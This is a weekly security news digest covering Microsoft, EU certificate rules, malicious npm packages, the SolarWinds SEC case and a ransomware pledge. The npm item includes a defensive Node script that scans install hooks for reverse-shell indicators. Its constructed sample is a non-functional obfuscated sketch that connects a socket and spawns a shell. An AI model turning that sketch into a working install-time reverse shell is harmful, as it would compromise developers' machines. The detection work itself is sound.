11/3/23: SolarWinds, Microsoft, npm, ransoms & more!

Here are this week's security highlights:

Microsoft vows to revamp the way it provides cybersecurity protection

In a blog post, three Microsoft executives said they “have put significant thought into how we should anticipate and adapt to the increasingly more sophisticated cyber threats.” The result is a commitment to three areas of engineering advancement: “transforming” software development, implementing new identity protections and driving faster vulnerability response. “In recent months, we’ve concluded within Microsoft that the increasing speed, scale, and sophistication of cyberattacks call for a new response,” President Brad Smith wrote in a separate posting. “This new initiative will bring together every part of Microsoft to advance cybersecurity protection.”


Proposed legal reform could fundamentally undermine security online in EU

More than 300 of the world's most respected cybersecurity experts have written to European Union lawmakers to warn that a proposed legal reform, which may soon become law, could fundamentally undermine security online. A similar joint letter from industry organizations including The Linux Foundation, Cloudflare, and Mozilla tells the lawmakers that the proposed regulation is a "dangerous intervention" that risks breaking the fragile system of trust that underpins the use of cryptographic certificates on the web. The security concern is that the reform would oblige browsers to accept certificates issued by government-designated certificate authorities without being able to apply their own root-store requirements to those CAs, so a compromised or coerced CA could issue certificates that browsers are not permitted to refuse.


48 malicious npm packages found

A new set of 48 malicious packages has been discovered in the npm registry with the capability to deploy a reverse shell on compromised systems. "These packages, deceptively named to appear legitimate, contained obfuscated JavaScript designed to initiate a reverse shell on package install," software supply chain security firm Phylum said. All of the counterfeit packages were published by an npm user named hktalent (an account of the same name exists on GitHub and X). As of writing, 39 of the packages uploaded by the author are still available for download. The delivery mechanism is npm's install-time lifecycle scripts (preinstall, install, postinstall), which run arbitrary commands on the installing machine during npm install, before any of the package's code is imported; a package that is never even required can therefore compromise a developer workstation or CI runner the moment it lands in a dependency tree.
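As an added example (not Phylum's tooling or Chainguard's code), the following Node script audits a package manifest the way a pre-install gate would: it lists every install-time lifecycle hook, follows a "node ./file.js" hook into the script it runs, undoes hex-escape obfuscation, and flags the ingredients of a reverse shell (process spawning, a raw socket, dynamic code, heavily encoded strings). The manifests and the setup.js body are constructed samples, not the real hktalent packages, and the indicator list is a starting heuristic, not a signature set.

```javascript
'use strict';

// npm lifecycle hooks that run during `npm install`, with the installing user's
// privileges, before a single line of the package is ever imported. `prepare`
// is included because it also fires when a dependency is installed from git.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Heuristic indicators of an install-time reverse shell. No single one is proof;
// any of them on an install hook is reason to block the package pending review.
const INDICATORS = [
  { name: 'process spawn',      re: /child_process|\b(spawn|exec|execSync)\s*\(/ },
  { name: 'network socket',     re: /require\(\s*['"]net['"]\s*\)|\.connect\s*\(/ },
  { name: 'dynamic code',       re: /\beval\s*\(|new\s+Function\s*\(|String\.fromCharCode/ },
  { name: 'hex-escaped string', re: /(\\x[0-9a-fA-F]{2}){8,}/ },
  { name: 'base64 blob',        re: /[A-Za-z0-9+/]{80,}={0,2}/ },
];

// Undo the cheapest obfuscation (\xNN escapes) so the other patterns can see
// through require("\x6e\x65\x74").
function decodeHexEscapes(src) {
  return src.replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Run every indicator over both the raw and the de-escaped source.
function matchIndicators(src) {
  const views = [src, decodeHexEscapes(src)];
  return INDICATORS.filter((ind) => views.some((v) => ind.re.test(v))).map((ind) => ind.name);
}

// manifest: a parsed package.json. readFile: (path) => string | null, used to
// follow a hook such as `node ./setup.js` into the file that actually runs.
function auditManifest(manifest, readFile) {
  const scripts = manifest.scripts || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    if (typeof scripts[hook] !== 'string') continue;
    const command = scripts[hook];
    let body = command;
    const m = /^node\s+(\S+)/.exec(command.trim());
    if (m) {
      const file = readFile(m[1]);
      if (file !== null) body += '\n' + file;
    }
    findings.push({ hook, command, indicators: matchIndicators(body) });
  }
  return findings;
}

// 'block': an install hook with reverse-shell indicators; 'review': an install
// hook that looks benign but still runs code at install time; 'ok': no hooks.
function verdict(findings) {
  if (findings.some((f) => f.indicators.length > 0)) return 'block';
  return findings.length > 0 ? 'review' : 'ok';
}

// --- Constructed samples (not the real packages from the report) ---
const SUSPICIOUS_MANIFEST = {
  name: 'sample-helper-lib',
  version: '1.0.3',
  scripts: { postinstall: 'node ./setup.js' },
};
const SUSPICIOUS_FILES = {
  // Non-functional sketch of the obfuscated pattern: hex-escaped module names,
  // a raw socket, and a spawned shell. HOST, PORT and SHELL are never defined.
  './setup.js': [
    'const cp = require("\\x63\\x68\\x69\\x6c\\x64\\x5f\\x70\\x72\\x6f\\x63\\x65\\x73\\x73");',
    'const net = require("\\x6e\\x65\\x74");',
    'const sock = net.connect(PORT, HOST, () => { const sh = cp.spawn(SHELL); });',
  ].join('\n'),
};
const CLEAN_MANIFEST = {
  name: 'sample-clean-lib',
  version: '2.0.0',
  scripts: { test: 'node test.js', build: 'tsc' },
};
// Hypothetical in-memory file reader standing in for reading the unpacked tarball.
const readFrom = (files) => (p) => (p in files ? files[p] : null);

const suspicious = auditManifest(SUSPICIOUS_MANIFEST, readFrom(SUSPICIOUS_FILES));
console.log(verdict(suspicious), JSON.stringify(suspicious, null, 2));
console.log(verdict(auditManifest(CLEAN_MANIFEST, readFrom({}))));
```

The blunt control is to disable lifecycle scripts altogether with npm install --ignore-scripts (or ignore-scripts=true in .npmrc), but that also breaks packages that legitimately build native code at install time, which is why a per-package audit like this, run on the unpacked tarball before it reaches a build, is the practical middle ground.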


SEC lawsuit against SolarWinds CISO scares cybersecurity leaders

In a development sparking chatter and debate throughout the cybersecurity world, the lawsuit filed by the U.S. Securities and Exchange Commission (SEC) against SolarWinds and its Chief Information Security Officer (CISO) is leaving CISOs across the industry spooked and reevaluating their roles. The SEC's lawsuit is a rare instance of a regulatory body targeting a CISO personally for alleged mismanagement of cybersecurity risks. The suit claims that the CISO was aware of the weaknesses in SolarWinds' security practices and systems but did not disclose them adequately to the company's investors, leading to misleading statements in SolarWinds' filings with the SEC.


48 governments pledge not to pay ransomware ransoms

The United States and a consortium of some four dozen countries will pledge this week to no longer pay ransoms demanded as part of ransomware attacks, a senior administration official said. The statement will come as part of this week's meeting of the International Counter Ransomware Initiative. The commitment will be part of a joint policy statement signed by 48 countries, the European Union, and INTERPOL, and it applies to the member governments themselves: it is a commitment that national government institutions will not pay, not a prohibition on private victims. This year's meeting of the initiative will focus on information sharing around incorporating artificial intelligence and blockchain analysis into the ransomware fight, a new information-sharing platform for member countries, and, in the spirit of fighting back, that first-ever policy statement declaring that member governments will not pay ransoms.


Going to #KubeCon in Chicago? Register to join a day of security, soiree, PartyCon, Kuberoke or all!

Don't forget to subscribe for weekly security updates.
